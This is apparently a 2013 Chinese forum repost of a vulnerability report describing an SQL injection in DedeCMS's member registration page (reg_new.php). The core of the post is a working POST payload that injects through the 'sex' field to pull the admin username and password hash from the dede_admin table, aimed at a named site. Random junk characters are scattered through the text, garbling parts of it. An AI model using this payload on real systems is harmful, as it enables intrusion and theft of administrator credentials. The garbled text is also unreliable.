漏洞类型: SQL注射漏洞/ P) ]9 l/ Z6 Y& V( G2 ^
简要描述:* |9 k/ _/ V, Y
' j7 k2 Z3 {# V( {. l& h
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
5 f8 ~' Z* |0 ^4 j8 o原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
P" P/ n) F4 z z详细说明:跟这个漏洞/ s9 L, Y, ^4 l- N0 q3 \9 f& y3 m1 B
5 N( G4 w1 R6 G6 s( B
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
& |( p4 e3 Q+ D9 a是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
4 v/ @) F! O% Y; y3 O" \0 t V3 XPOST提交以下数据,其实不用POST提交的,这样隐蔽点.3 t' ?- t+ u. w& f5 Z0 |
1 c$ Z) }% h) R: _6 s gwww.political-security.com/member/reg_new.php
3 e) O6 X1 }4 v7 S
S: P$ D `' O, o B6 C, r" `POST! f0 ^" M# { R
2 l7 R6 l1 C& A3 y% i
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&6 J( ]$ i+ G3 U% A
userid=c4rp3nt3r&uname=c4rp3nt3r1 n( C3 o- g1 q6 Q2 H
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss2 d( }* h" J- l `) |1 N5 k
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,0 |8 g$ A, |1 z+ g
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
8 L$ ~! s- d1 }2 ~%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对